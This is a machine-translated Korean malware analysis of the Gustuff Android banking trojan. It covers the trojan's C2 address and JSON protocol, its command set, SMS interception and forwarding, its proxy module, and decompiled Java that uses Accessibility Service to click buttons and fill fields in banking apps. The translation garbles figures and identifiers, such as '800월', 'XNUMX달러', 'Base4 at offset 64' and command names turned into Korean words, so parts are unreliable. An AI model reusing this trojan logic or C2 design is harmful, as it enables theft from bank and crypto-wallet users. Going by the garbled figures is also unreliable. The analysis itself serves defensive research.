Android 트로이 목마 Gustuff가 귀하의 계정에서 크림(피아트 및 암호화폐)을 제거하는 방법

얼마 전 Group-IB 보고 모바일 Android Trojan Gustuff의 활동에 대해 알아보세요. 이 공격은 국제 시장에서만 활동하며 100대 외국 은행의 고객, 모바일 32 암호화폐 지갑 사용자 및 대규모 전자상거래 리소스를 공격합니다. 하지만 Gustuff의 개발자는 Bestoffer라는 별명을 사용하는 러시아어를 사용하는 사이버 범죄자입니다. 최근까지 그는 자신의 트로이 목마를 "지식과 경험이 있는 사람들을 위한 진지한 제품"이라고 칭찬했습니다.

Group-IB 악성코드 분석 전문가 이반 피사레프 그의 연구에서 그는 Gustuff의 작동 방식과 그 위험이 무엇인지 자세히 설명합니다.

구스터프는 누구를 찾고 있나요?

Gustuff는 완전히 자동화된 기능을 갖춘 차세대 악성 코드에 속합니다. 개발자에 따르면 이 트로이 목마는 AndyBot 악성 코드의 새롭고 향상된 버전이 되었습니다. 이 악성 코드는 2017년 800월부터 유명 국제 은행 및 결제 시스템의 모바일 애플리케이션으로 가장한 피싱 웹 양식을 통해 안드로이드 휴대폰을 공격하고 돈을 훔쳐 왔습니다. Bestoffer는 Gustuff Bot 임대 가격이 월 XNUMX달러라고 보고했습니다.

Gustuff 샘플 분석에 따르면 트로이 목마는 Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank 및 암호화폐 지갑과 같은 대형 은행의 모바일 애플리케이션을 사용하는 고객을 잠재적으로 표적으로 삼고 있는 것으로 나타났습니다. 비트코인 지갑, BitPay, Cryptopay, Coinbase 등

원래는 고전적인 뱅킹 트로이 목마로 만들어졌지만 현재 버전에서는 Gustuff가 잠재적인 공격 대상 목록을 크게 확장했습니다. Gustuff는 은행, 핀테크 회사 및 암호화폐 서비스용 Android 애플리케이션 외에도 마켓플레이스 애플리케이션, 온라인 상점, 결제 시스템 및 인스턴트 메신저 사용자를 대상으로 합니다. 특히 PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut 등이 있습니다.

진입점 : 대량감염 계산

Gustuff는 APK 링크가 포함된 SMS 메일을 통해 Android 스마트폰에 침투하는 "고전적인" 벡터가 특징입니다. 안드로이드 기기가 서버의 명령으로 트로이 목마에 감염되면 Gustuff는 감염된 휴대폰의 연락처 데이터베이스나 서버 데이터베이스를 통해 추가로 확산될 수 있습니다. Gustuff의 기능은 대량 감염과 운영자 비즈니스의 최대 자본화를 위해 설계되었습니다. 여기에는 합법적인 모바일 뱅킹 애플리케이션과 암호화폐 지갑에 대한 고유한 "자동 채우기" 기능이 있어 자금 도난 속도를 높이고 규모를 확대할 수 있습니다.

트로이목마에 대한 연구 결과, 장애인을 위한 서비스인 접근성 서비스(Accessibility Service)를 이용해 자동완성 기능이 구현된 것으로 나타났다. Gustuff는 이 Android 서비스를 사용하여 다른 애플리케이션의 창 요소와의 상호 작용에 대한 보호를 성공적으로 우회한 최초의 트로이 목마가 아닙니다. 하지만 아직까지 자동차 필러와 접근성 서비스를 함께 활용하는 사례는 매우 드뭅니다.

Gustuff는 피해자의 휴대폰에 다운로드한 후 접근성 서비스를 사용하여 다른 애플리케이션(뱅킹, 암호화폐, 온라인 쇼핑, 메시징 애플리케이션 등)의 창 요소와 상호 작용하여 공격자에게 필요한 작업을 수행할 수 있습니다. . 예를 들어, 서버 명령에 따라 트로이 목마는 버튼을 누르고 은행 애플리케이션의 텍스트 필드 값을 변경할 수 있습니다. 접근성 서비스 메커니즘을 사용하면 트로이 목마는 이전 세대의 모바일 트로이 목마에 대응하기 위해 은행에서 사용하는 보안 메커니즘과 Google이 Android OS의 새 버전에서 구현한 보안 정책의 변경 사항을 우회할 수 있습니다. 따라서 Gustuff는 Google Protect 보호를 비활성화하는 방법을 알고 있습니다. 저자에 따르면 이 기능은 70%의 경우에 작동합니다.

Gustuff는 합법적인 모바일 애플리케이션 아이콘과 함께 가짜 PUSH 알림을 표시할 수도 있습니다. 사용자는 PUSH 알림을 클릭하고 서버에서 다운로드된 피싱 창을 보게 되며, 여기에 요청된 은행 카드 또는 암호화폐 지갑 데이터를 입력합니다. 또 다른 Gustuff 시나리오에서는 PUSH 알림이 표시된 애플리케이션이 열립니다. 이 경우, 악성 코드는 접근성 서비스를 통해 서버의 명령에 따라 사기 거래에 대한 은행 애플리케이션의 양식 필드를 채울 수 있습니다.

Gustuff의 기능에는 감염된 장치에 대한 정보를 서버로 보내기, SMS 메시지 읽기/보내기, USSD 요청 보내기, SOCKS5 프록시 실행, 링크 따라 가기, 파일(문서의 사진 스캔, 스크린샷, 사진 포함) 보내기 등이 포함됩니다. 서버, 장치를 공장 설정으로 재설정합니다.

악성코드 분석

악성 애플리케이션을 설치하기 전에 Android OS는 사용자에게 Gustuff가 요청한 권한 목록이 포함된 창을 표시합니다.

애플리케이션은 사용자의 동의를 받은 후에만 설치됩니다. 응용 프로그램을 시작한 후 트로이 목마는 사용자에게 다음 창을 표시합니다.

그런 다음 해당 아이콘이 제거됩니다.

저자에 따르면 Gustuff는 FTT의 패커에 의해 포장되었습니다. 시작 후 애플리케이션은 주기적으로 CnC 서버에 연결하여 명령을 받습니다. 우리가 조사한 여러 파일은 IP 주소를 제어 서버로 사용했습니다. 88.99.171[.]105 (이하 로 표기하겠습니다. <%CnC%>).

실행 후 프로그램은 서버에 메시지를 보내기 시작합니다. http://<%CnC%>/api/v1/get.php.

응답은 다음 형식의 JSON이 될 것으로 예상됩니다.

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

애플리케이션에 액세스할 때마다 감염된 장치에 대한 정보를 보냅니다. 메시지 형식은 아래와 같습니다. 필드가 있다는 점은 주목할 가치가 있습니다. 가득 찬, 여분의, 앱 и 허가 – 선택 사항이며 CnC에서 요청 명령이 있는 경우에만 전송됩니다.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

구성 데이터 저장

Gustuff는 운영상 중요한 정보를 기본 설정 파일에 저장합니다. 파일 이름과 그 안의 매개변수 이름은 문자열에서 MD5 합계를 계산한 결과입니다. 15413090667214.6.1<%이름%>어디에서 <%이름%> — 초기 이름-값. 이름 생성 함수의 Python 해석:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input) 

다음에서는 이를 다음과 같이 표기하겠습니다. 이름생성기(입력).
따라서 첫 번째 파일 이름은 다음과 같습니다. nameGenerator("API_SERVER_LIST"), 여기에는 다음 이름의 값이 포함됩니다.

변수 이름	가치
nameGenerator("API_SERVER_LIST")	배열 형식의 CnC 주소 목록을 포함합니다.
nameGenerator("API_SERVER_URL")	CnC 주소를 포함합니다.
nameGenerator("SMS_UPLOAD")	플래그는 기본적으로 설정됩니다. 플래그가 설정된 경우 CnC에 SMS 메시지를 보냅니다.
nameGenerator("SMS_ROOT_NUMBER")	감염된 장치에서 수신한 SMS 메시지가 전송될 전화번호입니다. 기본값은 null입니다.
nameGenerator("SMS_ROOT_NUMBER_RESEND")	플래그는 기본적으로 지워집니다. 설치된 경우 감염된 장치가 SMS를 수신하면 루트 번호로 전송됩니다.
nameGenerator("DEFAULT_APP_SMS")	플래그는 기본적으로 지워집니다. 이 플래그가 설정되면 애플리케이션은 수신되는 SMS 메시지를 처리합니다.
이름생성기("DEFAULT_ADMIN")	플래그는 기본적으로 지워집니다. 플래그가 설정되어 있으면 응용 프로그램에 관리자 권한이 있는 것입니다.
nameGenerator("DEFAULT_ACCESSIBILITY")	플래그는 기본적으로 지워집니다. 플래그가 설정되어 있으면 접근성 서비스를 사용하는 서비스가 실행되고 있는 것입니다.
nameGenerator("APPS_CONFIG")	특정 애플리케이션과 관련된 접근성 이벤트가 트리거될 때 수행해야 하는 작업 목록이 포함된 JSON 개체입니다.
nameGenerator("APPS_INSTALLED")	장치에 설치된 애플리케이션 목록을 저장합니다.
nameGenerator("IS_FIST_RUN")	플래그는 처음 시작할 때 재설정됩니다.
nameGenerator("UNIQUE_ID")	고유 식별자를 포함합니다. 봇이 처음 실행될 때 생성됩니다.

서버의 명령을 처리하는 모듈

애플리케이션은 CnC 서버의 주소를 다음과 같이 인코딩된 배열 형태로 저장합니다. 베이스 윤곽. CnC 서버 목록은 해당 명령을 수신하면 변경될 수 있으며, 이 경우 주소는 기본 설정 파일에 저장됩니다.

요청에 대한 응답으로 서버는 애플리케이션에 명령을 보냅니다. 명령과 매개변수가 JSON 형식으로 표시된다는 점은 주목할 가치가 있습니다. 애플리케이션은 다음 명령을 처리할 수 있습니다.

팀	기술
앞으로시작	감염된 장치에서 수신한 SMS 메시지를 CnC 서버로 보내기 시작합니다.
앞으로중지	감염된 장치에서 수신한 SMS 메시지를 CnC 서버로 보내는 것을 중지합니다.
ussd실행	USSD 요청을 실행합니다. USSD를 요청해야 하는 번호는 JSON 필드 “number”에 있습니다.
문자를 보내다	하나의 SMS 메시지를 보냅니다(필요한 경우 메시지가 여러 부분으로 "분할"됩니다). 이 명령은 매개변수로 대상 번호인 "to" 필드와 메시지 본문인 "body" 필드가 포함된 JSON 개체를 사용합니다.
sendSmsAb	감염된 장치의 연락처 목록에 있는 모든 사람에게 SMS 메시지를 보냅니다(필요한 경우 메시지가 여러 부분으로 "분할"됨). 메시지 전송 간격은 10초입니다. 메시지 본문은 JSON 필드 "body"에 있습니다.
보내기SmsMass	명령 매개변수에 지정된 연락처로 SMS 메시지(필요한 경우 메시지가 여러 부분으로 "분할"됨)를 보냅니다. 메시지 전송 간격은 10초입니다. 이 명령은 매개변수로 JSON 배열("sms" 필드)을 사용하며, 그 요소에는 대상 번호인 "to" 필드와 메시지 본문인 "body" 필드가 포함되어 있습니다.
변경 서버	이 명령은 "url" 키를 매개변수로 사용하여 값을 취할 수 있습니다. 그러면 봇은 nameGenerator("SERVER_URL") 또는 "array"의 값을 변경합니다. 그런 다음 봇은 nameGenerator("API_SERVER_LIST")에 배열을 씁니다. 따라서 애플리케이션은 CnC 서버의 주소를 변경합니다.
관리자번호	이 명령은 루트 번호와 함께 작동하도록 설계되었습니다. 이 명령은 다음 매개변수가 있는 JSON 개체를 허용합니다. "number" — nameGenerator("ROOT_NUMBER")를 수신된 값으로 변경, "resend" — nameGenerator("SMS_ROOT_NUMBER_RESEND") 변경, "sendId" — nameGenerator("ROOT_NUMBER"로 보내기) ) 고유 ID.
정보를 업데이트	감염된 장치에 대한 정보를 서버로 보냅니다.
데이터 지우기	이 명령은 사용자 데이터를 삭제하기 위한 것입니다. 애플리케이션이 시작된 이름에 따라 장치를 재부팅하면 데이터가 완전히 삭제되거나(기본 사용자) 사용자 데이터만 삭제됩니다(보조 사용자).
양말시작	프록시 모듈을 실행합니다. 모듈의 작동은 별도의 섹션에서 설명됩니다.
양말그만	프록시 모듈을 중지합니다.
오픈링크	링크를 따라가세요. 링크는 "url" 키 아래 JSON 매개변수에 있습니다. "android.intent.action.VIEW"는 링크를 여는 데 사용됩니다.
uploadAllSms	장치에서 수신한 모든 SMS 메시지를 서버로 보냅니다.
모든사진업로드	감염된 장치의 이미지를 URL로 보냅니다. URL은 매개변수로 제공됩니다.
업로드파일	감염된 장치에서 URL로 파일을 보냅니다. URL은 매개변수로 제공됩니다.
업로드전화번호	연락처 목록의 전화번호를 서버로 보냅니다. "ab" 키가 포함된 JSON 개체 값이 매개 변수로 수신되면 애플리케이션은 전화번호부에서 연락처 목록을 수신합니다. "sms" 키가 포함된 JSON 개체가 매개변수로 수신되면 애플리케이션은 SMS 메시지 발신자의 연락처 목록을 읽습니다.
변경아카이브	애플리케이션은 "url" 키를 사용하여 매개변수로 제공되는 주소에서 파일을 다운로드합니다. 다운로드한 파일은 “archive.zip”이라는 이름으로 저장됩니다. 그런 다음 애플리케이션은 선택적으로 아카이브 비밀번호 "b5jXh37gxgHBrZhQ4j3D"를 사용하여 파일의 압축을 풉니다. 압축이 풀린 파일은 [외부저장소]/hgps 디렉터리에 저장됩니다. 이 디렉터리에 애플리케이션은 웹 가짜를 저장합니다(아래 설명 참조).
행위	이 명령은 별도의 섹션에서 설명하는 작업 서비스와 함께 작동하도록 설계되었습니다.
test	아무것도하지 않고.
다운로드	이 명령은 원격 서버에서 파일을 다운로드하여 "다운로드" 디렉터리에 저장하기 위한 것입니다. URL과 파일 이름은 각각 JSON 매개변수 객체의 매개변수 필드인 "url" 및 "fileName"으로 제공됩니다.
제거	"다운로드" 디렉터리에서 파일을 제거합니다. 파일 이름은 "fileName" 키가 있는 JSON 매개변수로 제공됩니다. 표준 파일 이름은 “tmp.apk”입니다.
공고	관리 서버에서 정의한 설명 및 제목 텍스트가 포함된 알림을 표시합니다.

명령 형식 공고:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

조사 중인 파일에서 생성된 알림은 필드에 지정된 애플리케이션에서 생성된 알림과 동일해 보입니다. 앱. 필드 값인 경우 오픈앱 — True, 알림이 열리면 필드에 지정된 애플리케이션이 시작됩니다. 앱. 필드 값인 경우 오픈앱 — 거짓이면:

• 피싱 창이 열리고 그 내용은 디렉터리에서 다운로드됩니다. <%외부 저장소%>/hgps/<%파일 이름%>
• 피싱 창이 열리고 그 내용은 서버에서 다운로드됩니다. <%url%>?id=<%Bot id%>&app=<%애플리케이션 이름%>
• Google Play 카드로 위장한 피싱 창이 열리고 카드 세부정보를 입력할 수 있습니다.

애플리케이션은 명령의 결과를 다음으로 보냅니다. <%CnC%>set_state.php 다음 형식의 JSON 객체로:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

작업서비스
애플리케이션이 처리하는 명령 목록 동작. 명령이 수신되면 명령 처리 모듈은 이 서비스에 액세스하여 확장 명령을 실행합니다. 서비스는 JSON 개체를 매개변수로 허용합니다. 서비스는 다음 명령을 실행할 수 있습니다.

1. PARAMS_ACTION — 이러한 명령을 수신할 때 서비스는 먼저 JSON 매개변수로부터 다음과 같은 Type 키 값을 수신합니다.

• 서비스정보 – 하위 명령은 JSON 매개변수에서 키로 값을 가져옵니다. 중요하지 않음. 플래그가 True이면 애플리케이션은 플래그를 설정합니다. FLAG_ISOLATED_PROCESS 접근성 서비스를 사용하는 서비스에. 이렇게 하면 서비스가 별도의 프로세스로 시작됩니다.
• 뿌리 — 현재 초점이 맞춰져 있는 창에 대한 정보를 받고 서버로 보냅니다. 애플리케이션은 AccessibilityNodeInfo 클래스를 사용하여 정보를 얻습니다.
• 관리자 — 관리자 권한을 요청합니다.
• 지연 — "data" 키의 매개변수에 지정된 밀리초 동안 ActionsService를 일시 중지합니다.
• 창 — 사용자에게 표시되는 창 목록을 보냅니다.
• 설치 — 감염된 장치에 애플리케이션을 설치합니다. 아카이브 패키지의 이름은 "fileName" 키에 있습니다. 아카이브 자체는 다운로드 디렉터리에 있습니다.
• 글로벌 – 하위 명령은 현재 창에서 탐색하기 위한 것입니다.
  • 빠른 설정 메뉴에서
  • 전
  • 집
  • 알림에
  • 최근에 열린 응용 프로그램 창으로

• 시작 - 응용 프로그램을 실행합니다. 애플리케이션 이름은 키별로 매개변수로 제공됩니다. 데이터.
• 소리 — 사운드 모드를 무음으로 변경합니다.
• 잠금을 해제 — 화면과 키보드의 백라이트를 최대 밝기로 켭니다. 애플리케이션은 WakeLock을 사용하여 [Application lable]:INFO 문자열을 태그로 지정하여 이 작업을 수행합니다.
• 허가오버레이 — 기능이 구현되지 않았습니다(명령 실행에 대한 응답은 {"message":"Not support"} 또는 {"message":"low sdk"}입니다).
• 몸짓 — 기능이 구현되지 않았습니다(명령 실행에 대한 응답은 {"message":"Not support"}또는 {"message":"Low API"}입니다).
• 권한 — 이 명령은 애플리케이션에 대한 권한을 요청하는 데 필요합니다. 그러나 쿼리 기능이 구현되어 있지 않아 명령어의 의미가 없습니다. 요청된 권한 목록은 "권한" 키가 포함된 JSON 배열로 제공됩니다. 표준 목록:
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_CONTACTS
  • android.permission.CALL_PHONE
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.READ_SMS
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.WRITE_EXTERNAL_STORAGE

• 열 수 — 피싱 창을 표시합니다. 서버에서 제공되는 매개변수에 따라 애플리케이션에 다음과 같은 피싱 창이 표시될 수 있습니다.
  • 디렉터리의 파일에 내용이 기록된 피싱 창 표시 <%외부 디렉터리%>/hgps/<%param_filename%>. 창과 사용자 상호 작용의 결과는 다음으로 전송됩니다. <%CnC%>/records.php
  • 주소에서 콘텐츠가 미리 로드된 피싱 창 표시 <%url_param%>?id=<%bot_id%>&app=<%packagename%>. 창과 사용자 상호 작용의 결과는 다음으로 전송됩니다. <%CnC%>/records.php
  • Google Play 카드로 위장한 피싱 창을 표시합니다.

• 대화형 — 이 명령은 AcessibilityService를 사용하여 다른 응용 프로그램의 창 요소와 상호 작용하도록 설계되었습니다. 상호 작용을 위해 프로그램에 특별 서비스가 구현되었습니다. 조사 중인 애플리케이션은 창과 상호 작용할 수 있습니다.
  • 현재 활동 중입니다. 이 경우 매개변수에는 상호작용해야 하는 개체의 ID 또는 텍스트(이름)가 포함됩니다.
  • 명령이 실행될 때 사용자에게 표시됩니다. 응용 프로그램은 ID별로 창을 선택합니다.

  물건을 받은 후 접근성노드정보 관심 있는 창 요소의 경우 애플리케이션은 매개변수에 따라 다음 작업을 수행할 수 있습니다.

  • focus — 객체에 포커스를 설정합니다.
  • 클릭 - 개체를 클릭합니다.
  • actionId — ID로 작업을 수행합니다.
  • setText — 객체의 텍스트를 변경합니다. 텍스트 변경은 두 가지 방법으로 가능합니다: 작업 수행 ACTION_SET_TEXT (감염된 장치의 Android 버전이 다음 버전보다 낮거나 같은 경우 사탕 과자) 또는 클립보드에 문자열을 배치하고 객체에 붙여넣는 방법(이전 버전의 경우)이 있습니다. 이 명령은 뱅킹 애플리케이션에서 데이터를 변경하는 데 사용할 수 있습니다.

2. PARAMS_ACTIONS - 같은 PARAMS_ACTION, 명령의 JSON 배열만 도착합니다.

많은 사람들이 다른 애플리케이션의 창 요소와 상호 작용하는 기능이 어떤 것인지에 관심을 가질 것 같습니다. Gustuff에서 이 기능을 구현하는 방법은 다음과 같습니다.

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

텍스트 교체 기능:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

따라서 제어 서버를 올바르게 구성하면 Gustuff는 뱅킹 애플리케이션의 텍스트 필드를 입력하고 거래를 완료하는 데 필요한 버튼을 클릭할 수 있습니다. 트로이 목마는 애플리케이션에 로그인할 필요조차 없습니다. PUSH 알림을 표시하는 명령을 보낸 다음 이전에 설치된 뱅킹 애플리케이션을 여는 것만으로도 충분합니다. 사용자는 자신을 인증한 후 Gustuff가 차량을 채울 수 있습니다.

SMS 메시지 처리 모듈

애플리케이션은 감염된 장치가 SMS 메시지를 수신할 수 있도록 이벤트 핸들러를 설치합니다. 연구 중인 애플리케이션은 운영자로부터 SMS 메시지 본문에 포함된 명령을 받을 수 있습니다. 명령은 다음 형식으로 제공됩니다.

7!5=<%Base64로 인코딩된 명령%>

애플리케이션은 수신되는 모든 SMS 메시지에서 문자열을 검색합니다. 7!5=, 문자열이 감지되면 오프셋 64에서 Base4의 문자열을 디코딩하고 명령을 실행합니다. 명령은 CnC의 명령과 유사합니다. 실행 결과는 명령이 나온 것과 동일한 번호로 전송됩니다. 응답 형식:

7*5=<%“result_code 명령”의 Base64 인코딩%>

선택적으로 애플리케이션은 수신된 모든 메시지를 루트 번호로 보낼 수 있습니다. 이렇게 하려면 기본 설정 파일에 루트 번호를 지정하고 메시지 리디렉션 플래그를 설정해야 합니다. SMS 메시지는 다음 형식으로 공격자의 번호로 전송됩니다.

<%From number%> - <%Time, 형식: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

또한 선택적으로 애플리케이션이 CnC에 메시지를 보낼 수도 있습니다. SMS 메시지는 JSON 형식으로 서버에 전송됩니다.

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

플래그가 설정된 경우 nameGenerator("DEFAULT_APP_SMS") – 애플리케이션이 SMS 메시지 처리를 중지하고 수신 메시지 목록을 지웁니다.

프록시 모듈

연구 중인 애플리케이션에는 구성이 포함된 정적 필드를 포함하는 별도의 클래스가 있는 Backconnect 프록시 모듈(이하 프록시 모듈이라고 함)이 포함되어 있습니다. 구성 데이터는 샘플에 명확한 형식으로 저장됩니다.

프록시 모듈에서 수행되는 모든 작업은 파일에 기록됩니다. 이를 위해 외부 저장소의 애플리케이션은 로그 파일이 저장되는 "logs"(구성 클래스의 ProxyConfigClass.logsDir 필드)라는 디렉터리를 생성합니다. 로깅은 이름이 다음과 같은 파일에서 발생합니다.

1. main.txt – CommandServer라는 클래스의 작업이 이 파일에 기록됩니다. 다음에서는 str 문자열을 이 파일에 기록하는 것이 mainLog(str)로 표시됩니다.
2. 세션-<%id%>.txt — 이 파일은 특정 프록시 세션과 관련된 로그 데이터를 저장합니다. 다음에서는 문자열 str을 이 파일에 기록하는 것이 sessionLog(str)로 표시됩니다.
3. 서버.txt – 이 파일은 위에서 설명한 파일에 기록된 모든 데이터를 기록하는 데 사용됩니다.

로그 데이터 형식:

<%Date%> [스레드[<%thread id%>], id[]]: 로그 문자열

Proxy 모듈 동작 중 발생하는 예외 사항도 파일에 기록됩니다. 이를 위해 애플리케이션은 다음 형식으로 JSON 객체를 생성합니다.

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

그런 다음 이를 문자열 표현으로 변환하고 기록합니다.

해당 명령을 받은 후 프록시 모듈이 시작됩니다. 프록시 모듈을 시작하는 명령이 수신되면 애플리케이션은 다음과 같은 서비스를 시작합니다. 메인서비스, 프록시 모듈의 작동 관리(시작 및 중지)를 담당합니다.

서비스 시작 단계:

1. XNUMX분에 한 번씩 실행되는 타이머를 시작하고 프록시 모듈의 활동을 확인합니다. 모듈이 활성화되어 있지 않으면 모듈이 시작됩니다.
또한 이벤트가 발생하면 android.net.conn.CONNECTIVITY_CHANGE 프록시 모듈이 시작됩니다.

2. 애플리케이션은 매개변수를 사용하여 wake-lock을 생성합니다. PARTIAL_WAKE_LOCK 그를 붙잡습니다. 이렇게 하면 장치 CPU가 절전 모드로 전환되는 것을 방지할 수 있습니다.

3. 먼저 라인을 로깅하여 프록시 모듈의 명령 처리 클래스를 시작합니다. mainLog("서버 시작") и

서버::start() 호스트[<%proxy_cnc%>], commandPort[<%command_port%>], ProxyPort[<%proxy_port%>]

어디에서 Proxy_cnc, command_port 및 Proxy_port – 프록시 서버 구성에서 얻은 매개변수입니다.

명령 처리 클래스를 호출합니다. 명령연결. 시작 후 즉시 다음 작업을 수행합니다.

4. 연결 대상 ProxyConfigClass.host: ProxyConfigClass.commandPort 감염된 장치에 대한 데이터를 JSON 형식으로 보냅니다.

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

장소 :

• id – 식별자는 "x"라는 공유 기본 설정 파일에서 "id" 필드를 사용하여 값을 가져오려고 합니다. 이 값을 얻을 수 없으면 새 값을 생성합니다. 따라서 프록시 모듈에는 Bot ID와 유사하게 생성되는 자체 식별자가 있습니다.
• imei — 장치의 IMEI입니다. 값을 가져오는 과정에서 오류가 발생한 경우 이 필드 대신 오류 텍스트 메시지가 기록됩니다.
• imsi — 장치의 국제 모바일 가입자 ID입니다. 값을 가져오는 과정에서 오류가 발생한 경우 이 필드 대신 오류 텍스트 메시지가 기록됩니다.
• model — 최종 사용자가 볼 수 있는 최종 제품의 이름입니다.
• 제조업체 — 제품/하드웨어 제조업체(Build.MANUFACTURER).
• androidVersion - "<%release_version%> (<%os_version%>),<%sdk_version%>" 형식의 문자열
• 국가 — 장치의 현재 위치.
• PartnerId는 빈 문자열입니다.
• packageName – 패키지 이름.
• networkType — 현재 네트워크 연결 유형(예: "WIFI", "MOBILE"). 오류가 있는 경우 null을 반환합니다.
• hasGsmSupport – true – 전화기가 GSM을 지원하는 경우, 그렇지 않으면 false입니다.
• simReady – SIM 카드 상태.
• simCountry - ISO 국가 코드(SIM 카드 제공업체 기준).
• networkOperator — 운영자 이름. 값을 가져오는 과정에서 오류가 발생한 경우 이 필드 대신 오류 텍스트 메시지가 기록됩니다.
• simOperator - 서비스 공급자 이름(SPN)입니다. 값을 가져오는 과정에서 오류가 발생한 경우 이 필드 대신 오류 텍스트 메시지가 기록됩니다.
• 버전 - 이 필드는 구성 클래스에 저장되며 테스트된 봇 버전의 경우 "1.6"과 동일했습니다.

5. 서버의 명령을 기다리는 모드로 전환합니다. 서버의 명령은 다음 형식으로 제공됩니다.

• 0 오프셋 - 명령
• 1 오프셋 – sessionId
• 2 오프셋 - 길이
• 4 오프셋 - 데이터

명령이 도착하면 애플리케이션은 다음을 기록합니다.
mainLog("헤더 { sessionId<%id%>], 유형[<%command%>], 길이[<%length%>] }")

서버에서는 다음 명령이 가능합니다.

성함	명령	Data	상품 설명
연결 ID	0	연결 ID	새 연결 만들기
푹 잘	3	Time	프록시 모듈 일시 중지
탁구	4	-	PONG 메시지 보내기

PONG 메시지는 4바이트로 구성되며 다음과 같습니다. 0 X 04000000.

